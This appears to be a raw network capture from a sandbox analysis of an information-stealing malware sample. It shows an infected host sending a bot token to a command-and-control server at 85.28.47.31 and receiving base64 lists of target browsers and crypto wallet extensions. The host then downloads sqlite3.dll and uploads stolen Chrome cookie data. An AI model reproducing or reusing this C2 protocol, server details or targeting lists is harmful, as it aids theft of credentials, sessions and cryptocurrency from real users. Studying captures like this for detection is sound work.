Jul 26, 2024 20:09:01.593898058 CEST	466	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGC Host: 85.28.47.31 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 2d 2d 0d 0a Data Ascii: ------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="message"browsers------KEHJKJDGCGDAKFHIDBGC--
Jul 26, 2024 20:09:01.806668043 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:01 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Jul 26, 2024 20:09:01.806811094 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Jul 26, 2024 20:09:01.809555054 CEST	465	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFID Host: 85.28.47.31 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 2d 2d 0d 0a Data Ascii: ------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="message"plugins------GIEHJDHCBAEHJJJKKFID--
Jul 26, 2024 20:09:02.018393040 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:01 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Jul 26, 2024 20:09:02.018665075 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Jul 26, 2024 20:09:02.018703938 CEST	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Jul 26, 2024 20:09:02.019315004 CEST	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Jul 26, 2024 20:09:02.019351006 CEST	1236	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Jul 26, 2024 20:09:02.020159006 CEST	1164	IN	Data Raw: 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61 57 Data Ascii: V2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGp
Jul 26, 2024 20:09:02.022902966 CEST	466	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBK Host: 85.28.47.31 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="message"fplugins------CBKJJEHCBAKFBFHJKFBK--
Jul 26, 2024 20:09:02.214889050 CEST	335	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:02 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Jul 26, 2024 20:09:02.244610071 CEST	199	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIIEGDBKJKEBGCBAFCF Host: 85.28.47.31 Content-Length: 7291 Connection: Keep-Alive Cache-Control: no-cache
Jul 26, 2024 20:09:02.244699955 CEST	7291	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 Data Ascii: ------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Jul 26, 2024 20:09:03.426412106 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 20:09:03.707077980 CEST	90	OUT	GET /8405906461a5200c/sqlite3.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Jul 26, 2024 20:09:03.889301062 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:03 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT ETag: "10e436-5e7eeebed8d80" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Jul 26, 2024 20:09:03.889343023 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Jul 26, 2024 20:09:03.889360905 CEST	1236	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q
Jul 26, 2024 20:09:03.889982939 CEST	1236	IN	Data Raw: c0 5d c3 55 89 e5 8b 45 08 85 c0 74 07 5d ff 25 78 66 eb 61 5d c3 55 b8 08 00 00 00 89 e5 5d c3 55 31 c0 89 e5 5d c3 55 89 e5 83 ec 18 89 04 24 ff 15 4c 66 eb 61 c9 c3 55 89 e5 83 ec 18 8b 4d 08 85 c9 74 0c 89 0c 24 ff 15 4c 66 eb 61 99 eb 04 31 Data Ascii: ]UEt]%xfa]U]U1]U$LfaUMt$Lfa11UtBtRJ$~HD]UUtB]U1UtB]U1UtJtBB]JvYU@aSuK?
Jul 26, 2024 20:09:05.264727116 CEST	949	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAK Host: 85.28.47.31 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------DGIJEGHDAECAKECAFCAK--
Jul 26, 2024 20:09:06.270751953 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 20:09:06.387221098 CEST	561	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHCBAFIDAECBGCBFHJE Host: 85.28.47.31 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 